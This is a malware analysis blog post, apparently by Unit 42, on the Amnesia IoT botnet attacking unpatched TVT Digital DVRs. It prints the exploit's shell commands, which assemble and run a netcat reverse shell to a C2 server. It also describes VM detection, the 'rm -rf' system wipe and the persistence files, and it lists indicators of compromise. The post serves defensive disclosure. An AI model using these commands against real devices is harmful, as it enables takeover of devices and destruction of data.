# New IoT/Linux Malware Targets DVRs, Forms Botnet **[researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/](http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/)** Claud Xiao, Cong Zheng April 6, 2017 By [Claud Xiao and](https://unit42.paloaltonetworks.com/author/claud-xiao/) [Cong Zheng](https://unit42.paloaltonetworks.com/author/cong-zheng/) April 6, 2017 at 1:00 PM [Category: Malware,](https://unit42.paloaltonetworks.com/category/malware-2/) [Unit 42](https://unit42.paloaltonetworks.com/category/unit42/) Tags: [Amnesia,](https://unit42.paloaltonetworks.com/tag/amnesia/) [botnet,](https://unit42.paloaltonetworks.com/tag/botnet/) [DVR,](https://unit42.paloaltonetworks.com/tag/dvr/) [IoT,](https://unit42.paloaltonetworks.com/tag/iot/) [Linux,](https://unit42.paloaltonetworks.com/tag/linux/) [Tsunami](https://unit42.paloaltonetworks.com/tag/tsunami/) This post is also available in: 日本語 [(Japanese)](https://unit42.paloaltonetworks.jp/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/) Unit 42 researchers have identified a new variant of the IoT/Linux botnet “Tsunami”, which we are calling “Amnesia”. The Amnesia botnet targets an unpatched remote code execution [vulnerability that was publicly disclosed over a year ago in March 2016 in DVR (digital video](http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html) recorder) devices made by TVT Digital and branded by over 70 vendors worldwide (a listing of which can be found on the original vulnerability report we've linked to). Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000 devices around the world with Taiwan, the United States, Israel, Turkey, and India being the most exposed. ----- _Figure 1 Distribution of Vulnerable TVT Digital's DVR devices_ In addition, we believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion techniques to defeat malware analysis sandboxes. Virtual machine evasion techniques are more commonly associated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system. This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud. Amnesia exploits this remote code execution vulnerability by scanning for, locating, and attacking vulnerable systems. A successful attack results in Amnesia gaining full control of the device. Attackers could potentially harness the Amnesia botnet to launch broad DDoS attacks similar to the [Mirai botnet attacks we saw in Fall 2016.](https://krebsonsecurity.com/tag/mirai-botnet/) Even though this vulnerability was disclosed over a year ago, despite our best efforts, we have been unable to find updates that fix this vulnerability. While the Amnesia botnet hasn’t yet been used to mount large scale attacks, the Mirai botnet attacks show the potential harm large-scale IoT-based botnets can cause. Palo Alto Networks recommends all customers ensure they have our latest protections in place. Additionally, everyone should block traffic to Amnesia’s command and control servers (C2s) listed in Indicators of Compromise (IoC) section of this blog should do so. ## Technical Details ----- **Vulnerability Details** On March 22, 2016, security researcher Rotem Kerner disclosed the vulnerability to the public. [According to his blog, over 70 DVR vendors around the world were affected by the](http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html) vulnerability. However, all the DVR devices were manufactured by the same company, “TVT Digital”. To date, we have been unable to find any patch released by the vendors or the manufacturer to address the vulnerability. Additionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on Internet that are likely produced by TVT Digital. We also searched the [keyword on Shodan.io and on Censys.io. They reported about 50,000 and about 705,000 IP](https://www.shodan.io/search?query=%22Cross+Web+Server%22) addresses respectively. Table 1 shows the top 20 Countries for potentially vulnerable TVT Digital DVR devices: 1. Taiwan 47170 2. United States 44179 3. Israel 23355 4. Turkey 11780 5. India 9796 6. Malaysia 9178 7. Mexico 7868 8. Italy 7439 9. Vietnam 6736 10. United Kingdom 4402 11. Russia 3571 12. Hungary 3529 13. France 3165 14. Bulgaria 3040 15. Romania 2783 16. Colombia 2616 17. Egypt 2541 18. Canada 2491 ----- 19. Iran 1965 20. Argentina 1748 _Table 1 Top 20 Countries for potentially vulnerable TVT DVR Digital Devices_ **Propagation and Vulnerability Exploitation** Amnesia communicates with its C2 server using the IRC protocol. Figure 2 shows some commands it was designed to receive, including to launch DDoS attacks by different types of HTTP flooding and UDP flooding. _Figure 2 C2 Commands of Amnesia_ In addition to these commands, two more commands were implemented: CCTVSCANNER and CCTVPROCS. These commands are used for scanning and exploiting the RCE vulnerability in TVT Digital DVRs. After receiving the commands, Amnesia will firstly make a simple HTTP request to the IP address included with the command, checking whether the target is a vulnerable DVR device. This is done by searching for a special string “Cross Web Server” in the HTTP response content as shown in Figure 3 since the TVT Digital’s DVRs used this string as server name in HTTP header. ----- _Figure 3 Check whether the target is a vulnerable DVR_ If a vulnerable DVR is found, Amnesia will send four more HTTP requests which contains exploit payloads of four different shell commands. The commands are: echo "nc" > f echo "{one_of_c2_domains}" >> f echo "8888 –e $SHELL" >> f $(cat f) & > r These commands create a shell script file and execute it. The script content connects with one of Amnesia C2 servers and to expose system default shell. Therefore, the infected devices will be compromised and will listen further shell commands sent from C2 servers as shown in Figure 4 ----- _Figure 4 Exploit the RCE vulnerability_ **Anti-Forensics** When an Amnesia sample executes, it will immediately check whether it’s running in a virtual machine by reading files /sys/class/dmi/id/product_name and /sys/class/dmi/id/sys_vendor and comparing the file contents with keywords “VirtualBox”, “VMware” and “QEMU” as shown in Figure 5. These two files are used by Linux DMI (Desktop Management Interface) to store hardware’s product and manufacturer information. These strings being included in the DMI files implies that the Linux system is running in a virtual machine based on VirtualBox, VMware or QEMU, respectively. _Figure 5 Inspects DMI files to detect VM_ If a virtual machine was detected, Amnesia will delete itself, and then try to delete all of the following directories: 1. the Linux root directory “/”, 2. the current user’s home directory “~/”, and 3. the current working directory “./” These delete operations are basically equivalent to wiping the whole Linux system. They were implemented by simply executing shell command “rm -rf” as shown in Figure 6. For each directory, “rm” command will be executed twice – one in the background, and one in the foreground. Hence, the deleting of the three directories will be parallel. Finally, Amnesia will wait for the delete to finish. ----- _Figure 6 Wipe the Linux system_ We believe the author of Amnesia was aiming to defeat Linux-based malware analysis sandboxes and to cause trouble for security researchers due to a hard-coded but otherwise useless string in the code: “fxxkwhitehats”. However, VM based sandboxes typically have system snapshot enabled, allowing for quick recovery to the original state (the sample’s analysis task may be ruined though). The impact will be limited in these cases. The real problem is, if the malware infected some QEMU based Linux server instances, such as virtual hosts provided by VPS vendors, the Linux server will also be wiped, which could be catastrophic if back-ups are not available. After the VM check, Amnesia creates persistence files in /etc/init.d/.rebootime and /etc/cron.daily/.reboottime, or in ~/.bashrc and ~/.bash_history, depending on the current user’s privileges. It then kills all Telnet and SSH related processes, and connects with a C2 server to receive further commands. Amnesia hard-coded three domain names such as “irc.freenode.net” as decoy C2 server addresses. However, the real C2 configuration is decrypted during runtime by simple Caesar cipher algorithm. It chooses one of these three servers: ukranianhorseriding[.]net surrealzxc.co[.]za inversefierceapplied[.]pw All three of these domains have resolved to the same IP address 93.174.95[.]38 since December 1, 2016. Before that, the IP address was also used to host other IoT/Linuxst malware such as DropPerl. ## Conclusion Besides the threat that the Amnesia botnet presents, the malware reveals some interesting and notable trends of current IoT/Linux botnet threats: ----- IoT/Linux malware has begun to adopt classic techniques to evade and even wipe virtual machines. IoT/Linux malware targets and attacks known remote code execution vulnerabilities in IoT devices. These are typically manufactured by smaller manufacturers and there may be no patch available. IoT/Linux malware may also affect Linux servers deployed in VPS or in public cloud. In the case of Amnesia, because the malware relies on hard coded C2 addresses, preventing another Mirai-type attack is possible if these addresses are blocked as broadly as possible as quickly as possible. **Update: After publishing this report, we learned of other researchers’ past work on various** aspects of this malware. As we mentioned in the introduction, the Tsunami bot has a long history, and this latest version incorporated new features, including a scanner to identify and exploit DVRs for CCTV systems as well as Anti-VM detection capabilities. The CCTV scanning and exploitation technique was previously discussed in these two reports. 8ack - [Big Brother is attacking you](https://www.8ackprotect.com/blog/big_brother_is_attacking_you) [CyberX – Radiation Report](http://get.cyberx-labs.com/radiation-report) Researcher Michal Malik also noted this malware had VM detection capabilities in a Tweet in [January: https://twitter.com/michalmalik/status/818182119285473282](https://twitter.com/michalmalik/status/818182119285473282) ## Protections Palo Alto Networks has blocked the Domains used by this malware for command and control through PAN-DB and Threat Prevention. ## Indicators of Compromise C2 Domains and IP addresses ukranianhorseriding[.]net surrealzxc.co[.]za inversefierceapplied[.]pw 93.174.95[.]38 **Amnesia Sample SHA-256** 06d30ba7c96dcaa87ac584c59748708205e813a4dffa7568c1befa52ae5f0374 10aa7b3863f34d340f960b89e64319186b6ffb5d2f86bf0da3f05e7dbc5d9653 175fe89bbc8e44d45f4d86e0d96288e1e868524efa260ff07cb63194d04ea575 ----- 1d8bc81acbba0fc56605f60f5a47743491d48dab43b97a40d4a7f6c21caca12a 2f9cd1d07c535aae41d5eed1f8851855b95b5b38fb6fe139b5f1ce43ed22df22 327f24121d25ca818cf8414c1cc704c3004ae63a65a9128e283d64be03cdd42e 37b2b33a8e344efcaca0abe56c6163ae64026ccef65278b232a9170ada1972af 3a595e7cc8e32071781e36bbbb680d8578ea307404ec07e3a78a030574da8f96 4313af898c5e15a68616f8c40e8c7408f39e0996a9e4cc3e22e27e7aeb2f8d54 46ea20e3cf34d1d4cdfd797632c47396d9bdc568a75d550d208b91caa7d43a9b 4b0feb1dd459ade96297b361c69690ff69e97ca6ee5710c3dc6a030261ba69e0 4db9924decd3e578a6b7ed7476e499f8ed792202499b360204d6f5b807f881b8 5e6896b39c57d9609dc1285929b746b06e070886809692a4ac37f9e1b53b250c 64f03fff3ed6206337332a05ab9a84282f85a105432a3792e20711b920124707 6b2885a4f8c9d84e5dc49830abf7b1edbf1b458d8b9d2bafb680370106f93bc3 6b29b65c3886b6734df788cfc6628fbee4ce8921e3c0e8fc017e4dea2da0fd0b 885dce73237c4d7b4d481460baffbd5694ab671197e8c285d53b551f893d6c09 886136558ec806da5e70369ee22631bfb7fa06c27d16c987b6f6680423bc84b0 8f57ec9dfba8cf181a723a6ac2f5a7f50b4550dd33a34637cf0f302c43fd0243 9351ee0364bdbb5b2ff7825699e1b1ee319b600ea0726fd9bb56d0bd6c6670cb 9c7a5239601a361b67b1aa3f19b462fd894402846f635550a1d63bee75eab0a2 a010bf82e2c32cba896e04ec8dbff58e32eee9391f6986ab22c612165dad36a0 ad65c9937a376d9a53168e197d142eb27f04409432c387920c2ecfd7a0b941c8 aeb480cf01696b7563580b77605558f9474c34d323b05e5e47bf43ff16b67d6a b113ec41cc2fd9be9ac712410b9fd3854d7d5ad2dcaac33af2701102382d5815 b13014435108b34bb7cbcef75c4ef00429b440a2adf22976c31a1645af531252 b3d0d0e2144bd1ddd27843ef65a2fce382f6d590a8fee286fda49f8074711545 bdefa773e3f09cdc409f03a09a3982f917a0cc656b306f0ece3dd1a2564a8772 ----- c03b403d5de9778a2ec5949d869281f13976c2fc5b071e0f5f54277680c80902 cb2382b818993ef6b8c738618cc74a39ecab243302e13fdddb02943d5ba79483 ce61dcfc3419ddef25e61b6d30da643a1213aa725d579221f7c2edef40ca2db3 d0bda184dfa31018fe999dfd9e1f99ca0ef502296c2cccf454dde30e5d3a9df9 e7d6b3e1fba8cdf2f490031e8eb24cd515a30808cdd4aa15c2a41aa0016f8082 eb54dc959b3cc03fbd285cef9300c3cd2b7fe86b4adeb5ca7b098f90abb55b8a f23fecbb7386a2aa096819d857a48b853095a86c011d454da1fb8e862f2b4583 f6af2fa4f987df773d37d9bb44841a720817ce3817dbf1e983650b5af9295a16 f7a737cb73802d54f7758afe4f9d0a7d2ea7fda4240904c0a79abae732605729 f7cf1e0d7756d1874630d0d697c3b0f3df0632500cff1845b6308b11059deb07 f97848514b63e9d655a5d554e62f9e102eb477c5767638eeec9efd5c6ad443d8 **Ignite ’17 Security Conference: Vancouver, BC June 12–15, 2017** Ignite ’17 Security Conference is a live, four-day conference designed for today’s security professionals. Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry. Visit the [Ignite website for more information on tracks, workshops and](http://www.paloaltonetworksignite.com/) marquee sessions. **Get updates from** **Palo Alto** **Networks!** ----- Sign up to receive the latest news, cyber threat intelligence and research from us [By submitting this form, you agree to our Terms of Use and acknowledge our Privacy](https://www.paloaltonetworks.com/legal-notices/terms-of-use) Statement. -----